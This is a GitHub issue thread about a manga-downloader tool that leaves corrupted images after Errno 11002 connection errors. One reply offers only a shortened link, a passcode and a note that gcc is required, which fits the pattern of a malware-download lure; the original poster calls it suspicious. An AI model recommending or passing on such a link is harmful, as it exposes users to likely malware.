### ISSUE TITLE
Errno 11002 resumes with corrupted files

### ISSUE THREAD

**Issue by sonoyuki** [RicterZ/nhentai#327]
Hello, I'm using this tool to backup favourites from nhentai
Occasionally I end up with errors that look like this:
![image](https://github.com/user-attachments/assets/478f4397-dcf3-4f71-983b-56cd2a00fe40)
At first I thought it was just resuming where it left off once the connection was resolved, but in reality it just skips those images part way and results in corrupted files. 
I don't know how to fix this nor what the cause is, and I have no idea how many of my downloads are corrupted in this way without opening every image in every folder (perhaps there is a better way to do this but I don't personally know)
I also don't know why it can only download the 1st page of favorites before concluding rather than just... continuing 
Any help would be appreciated. 
Perhaps the problem is the result of using this https://github.com/edgar1016/nhentai-GUI
but from my very limited knowledge I don't know why that would be the case
Any help would be appreciated.

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by sonoyuki** [comment]
Sorry but no that is insanely suspicious....
